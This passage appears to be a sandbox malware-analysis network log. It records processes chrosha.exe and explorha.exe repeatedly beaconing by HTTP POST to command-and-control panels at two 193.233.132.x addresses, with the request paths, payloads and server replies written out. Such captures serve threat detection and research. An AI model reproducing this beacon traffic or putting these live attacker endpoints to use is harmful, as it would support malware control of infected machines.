                                                                                                                                                                                                                                      Apr 19, 2024 03:30:12.776716948 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      82192.168.2.549906193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:12.947726011 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:13.199318886 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:13.202181101 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:13.458098888 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      83192.168.2.549907193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:13.151559114 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:13.399878025 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      84192.168.2.549909193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:13.772336960 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:14.017925024 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      85192.168.2.549910193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:13.819487095 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:14.066620111 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:14.067485094 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:14.320136070 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      86192.168.2.549911193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:14.263441086 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:14.510910034 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      87192.168.2.549912193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:14.674686909 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:14.919282913 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:14.924643993 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:15.174932957 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      88192.168.2.549913193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:14.893996000 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:15.140826941 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:15.148159027 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:15.398729086 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      89192.168.2.549914193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:15.534241915 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:15.776917934 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:15.780670881 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:16.027312040 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      90192.168.2.549915193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:15.761995077 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:16.013458014 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      91192.168.2.549916193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:16.258913040 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:16.504342079 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      92192.168.2.549917193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:16.385515928 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:16.635970116 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:16.636969090 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:16.892774105 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      93192.168.2.549920193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:16.868186951 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
